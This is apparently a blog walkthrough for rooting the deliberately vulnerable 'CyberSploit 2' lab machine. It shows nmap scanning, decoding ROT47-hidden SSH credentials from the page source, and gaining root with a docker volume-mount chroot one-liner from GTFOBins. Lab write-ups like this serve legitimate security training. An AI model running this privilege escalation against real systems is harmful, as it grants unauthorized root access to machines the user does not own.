rooting cybersploit 2 machine ?


Target Machine IP Address:
My Machine IP Address:


Boot to Root

Your target is gain the Root access

There is no any flag in this VMs

Share root access with me twitter@cybersploit1

This works better with VirtualBox rather than VMware


You can download the machine from here.


Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0

nmap -sC -sV -p- -o nmap.log

22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos))

Let’s browse

Some strings are encrypted. Let’s check out the source code. (ctrl+u shortcut key)

Yes, this is a ROT47 encrypted message, I thought to write a script to do this however, let’s not waste time. Better google an online tool for this task.  I used this one.

username: D92:=6?5C2 -> shailendra
password: 4J36CDA=@:E-> cybersploit1

Since the target machine is running SSH service, let’s try that.

ssh shailendra@

ls -lah

We got a hint.txt

The system is running docker.

Remember always, this will be our black book of magic (gtfobins.github.io/)


docker run -v /:/mnt --rm -it alpine chroot /mnt sh 

However, in order to run this command, you need to provide the internet (at least in my case), else you might not able to download alpine/latest.

Finally, cybersploit2 is pwned!!

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also
Back to top button